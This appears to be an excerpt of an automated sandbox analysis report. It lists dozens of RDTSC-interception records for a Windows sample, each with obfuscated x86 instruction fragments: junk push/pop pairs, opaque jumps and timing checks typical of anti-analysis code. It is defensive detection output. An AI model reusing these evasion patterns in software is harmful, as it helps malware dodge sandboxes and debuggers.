Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6E5D4 second address: C6E5D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D84A second address: C6D854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D854 second address: C6D8F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push ebx 0x00000009 jmp 00007F1F18DC15D4h 0x0000000e pop ebx 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edx 0x00000013 call 00007F1F18DC15C8h 0x00000018 pop edx 0x00000019 mov dword ptr [esp+04h], edx 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc edx 0x00000026 push edx 0x00000027 ret 0x00000028 pop edx 0x00000029 ret 0x0000002a mov edi, dword ptr [ebp+122D37D5h] 0x00000030 push dword ptr fs:[00000000h] 0x00000037 jc 00007F1F18DC15C8h 0x0000003d mov bl, 26h 0x0000003f mov dword ptr fs:[00000000h], esp 0x00000046 mov ebx, 780F0F1Ah 0x0000004b mov eax, dword ptr [ebp+122D1021h] 0x00000051 mov dword ptr [ebp+1245A2F0h], ebx 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push edx 0x0000005c call 00007F1F18DC15C8h 0x00000061 pop edx 0x00000062 mov dword ptr [esp+04h], edx 0x00000066 add dword ptr [esp+04h], 00000019h 0x0000006e inc edx 0x0000006f push edx 0x00000070 ret 0x00000071 pop edx 0x00000072 ret 0x00000073 mov di, 4B61h 0x00000077 mov ebx, 3B57629Bh 0x0000007c nop 0x0000007d push edi 0x0000007e push eax 0x0000007f push edx 0x00000080 jbe 00007F1F18DC15C6h 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D8F4 second address: C6D8F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D8F8 second address: C6D90A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jng 00007F1F18DC15C6h 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D90A second address: C6D910 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6D910 second address: C6D914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6E751 second address: C6E76D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C6E76D second address: C6E773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C72646 second address: C7264A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7264A second address: C7264E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7264E second address: C72654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7584C second address: C75890 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jng 00007F1F18DC15C6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov ebx, dword ptr [ebp+122D1B34h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F1F18DC15C8h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 00000019h 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 push edi 0x00000032 pop edi 0x00000033 mov bl, 4Fh 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C75890 second address: C75896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C75896 second address: C7589B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7589B second address: C758A5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1F1851F5DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7694B second address: C7694F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7694F second address: C76958 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7F919 second address: C7F953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F1F18DC15D9h 0x0000000a jmp 00007F1F18DC15D6h 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1D9AD second address: C1D9EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1F1851F5D6h 0x0000000a pushad 0x0000000b popad 0x0000000c jno 00007F1F1851F5D6h 0x00000012 popad 0x00000013 jmp 00007F1F1851F5DAh 0x00000018 jnc 00007F1F1851F5DAh 0x0000001e popad 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 jnp 00007F1F1851F5D6h 0x00000028 jmp 00007F1F1851F5DDh 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1D9EB second address: C1DA3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D8h 0x00000007 ja 00007F1F18DC15C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F1F18DC15D0h 0x00000014 push ebx 0x00000015 jmp 00007F1F18DC15D5h 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1DA3A second address: C1DA3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7F0AF second address: C7F0BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jng 00007F1F18DC15C6h 0x0000000c popad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7F0BF second address: C7F0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7F1F9 second address: C7F1FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C7F1FF second address: C7F203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C83296 second address: C8329C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8329C second address: C832B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C832B2 second address: C832B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C832B8 second address: C832CC instructions: 0x00000000 rdtsc 0x00000002 je 00007F1F1851F5DAh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c js 00007F1F1851F5DCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C74963 second address: C749C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007F1F18DC15D2h 0x0000000e jno 00007F1F18DC15CCh 0x00000014 nop 0x00000015 mov ebx, dword ptr [ebp+122D18DDh] 0x0000001b push dword ptr fs:[00000000h] 0x00000022 movsx edi, si 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c mov edi, dword ptr [ebp+122D38C1h] 0x00000032 mov eax, dword ptr [ebp+122D08CDh] 0x00000038 mov ebx, dword ptr [ebp+122D3805h] 0x0000003e push FFFFFFFFh 0x00000040 movzx edi, si 0x00000043 nop 0x00000044 push ecx 0x00000045 jns 00007F1F18DC15CCh 0x0000004b pop ecx 0x0000004c push eax 0x0000004d pushad 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8786A second address: C87874 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C759DD second address: C75A6B instructions: 0x00000000 rdtsc 0x00000002 js 00007F1F18DC15C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e jmp 00007F1F18DC15D3h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov bh, 3Dh 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 push 00000000h 0x00000025 push eax 0x00000026 call 00007F1F18DC15C8h 0x0000002b pop eax 0x0000002c mov dword ptr [esp+04h], eax 0x00000030 add dword ptr [esp+04h], 00000016h 0x00000038 inc eax 0x00000039 push eax 0x0000003a ret 0x0000003b pop eax 0x0000003c ret 0x0000003d mov eax, dword ptr [ebp+122D0299h] 0x00000043 mov edi, dword ptr [ebp+122D3679h] 0x00000049 push FFFFFFFFh 0x0000004b push 00000000h 0x0000004d push edi 0x0000004e call 00007F1F18DC15C8h 0x00000053 pop edi 0x00000054 mov dword ptr [esp+04h], edi 0x00000058 add dword ptr [esp+04h], 00000014h 0x00000060 inc edi 0x00000061 push edi 0x00000062 ret 0x00000063 pop edi 0x00000064 ret 0x00000065 mov dword ptr [ebp+122D1929h], ebx 0x0000006b nop 0x0000006c jp 00007F1F18DC15D8h 0x00000072 push eax 0x00000073 push edx 0x00000074 jo 00007F1F18DC15C6h 0x0000007a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C75A6B second address: C75A7B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1F1851F5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C75A7B second address: C75A7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C76BC0 second address: C76BC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C87B2A second address: C87B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F18DC15D0h 0x00000009 popad 0x0000000a jp 00007F1F18DC15CCh 0x00000010 jbe 00007F1F18DC15C6h 0x00000016 popad 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jnc 00007F1F18DC15CCh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8DE0B second address: C8DE23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F1851F5DFh 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8E679 second address: C8E67D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8E67D second address: C8E683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8E683 second address: C8E6BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1F18DC15D9h 0x0000000c jmp 00007F1F18DC15D7h 0x00000011 popad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8E83C second address: C8E844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8E9B9 second address: C8E9BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8EB41 second address: C8EB47 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8EB47 second address: C8EB54 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1F18DC15C8h 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8EC9E second address: C8ECB4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1F1851F5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007F1F1851F5DCh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8ECB4 second address: C8ECBE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F1F18DC15C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8ECBE second address: C8ECCC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F1F1851F5D6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8ECCC second address: C8ECD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C8EF6D second address: C8EF77 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1F1851F5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C94C2E second address: C94C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C934D4 second address: C934F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F1851F5E0h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jp 00007F1F1851F5DEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C934F3 second address: C934FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C934FC second address: C93502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C93502 second address: C93555 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F1F18DC15D9h 0x0000000b jmp 00007F1F18DC15D0h 0x00000010 jmp 00007F1F18DC15D8h 0x00000015 jc 00007F1F18DC15C6h 0x0000001b popad 0x0000001c popad 0x0000001d pushad 0x0000001e push ecx 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C936A4 second address: C936C0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F1F1851F5D6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1F1851F5DCh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C936C0 second address: C936C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C93837 second address: C93860 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007F1F1851F5DFh 0x0000000d je 00007F1F1851F5D8h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 jng 00007F1F1851F5D6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C939CB second address: C939D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C939D1 second address: C939DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C939DA second address: C939E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C93B23 second address: C93B42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F1F1851F5D6h 0x0000000a jmp 00007F1F1851F5E4h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C93B42 second address: C93B47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C93C91 second address: C93C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C93E12 second address: C93E31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F18DC15D9h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C93E31 second address: C93E7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F1F1851F5E8h 0x00000013 jmp 00007F1F1851F5E7h 0x00000018 push edi 0x00000019 pop edi 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C93E7B second address: C93E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1F18DC15CBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C93E8A second address: C93E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C93E8E second address: C93E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F1F18DC15C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C93E9A second address: C93EA4 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1F1851F5DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C945A0 second address: C945C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F1F18DC15C6h 0x0000000a popad 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1F18DC15D5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C945C3 second address: C945DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5E4h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1A4AD second address: C1A4B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C1A4B1 second address: C1A4C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F1F1851F5D8h 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9321F second address: C93224 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9A2F9 second address: C9A2FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9A2FD second address: C9A301 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9A301 second address: C9A334 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F1F1851F5DCh 0x0000000c jmp 00007F1F1851F5E5h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 ja 00007F1F1851F5D6h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9A4A6 second address: C9A4B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1F18DC15CBh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9A4B8 second address: C9A4BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9AAFF second address: C9AB05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9AB05 second address: C9AB17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1F1851F5DEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9DED3 second address: C9DED8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9DED8 second address: C9DEDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9DEDE second address: C9DEF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1F18DC15CEh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9DEF3 second address: C9DEFD instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1F1851F5D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9DEFD second address: C9DF0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9DF0A second address: C9DF0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: C9DF0E second address: C9DF12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: CA14BB second address: CA14D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F1F1851F5E2h 0x0000000c jmp 00007F1F1851F5DCh 0x00000011 rdtsc
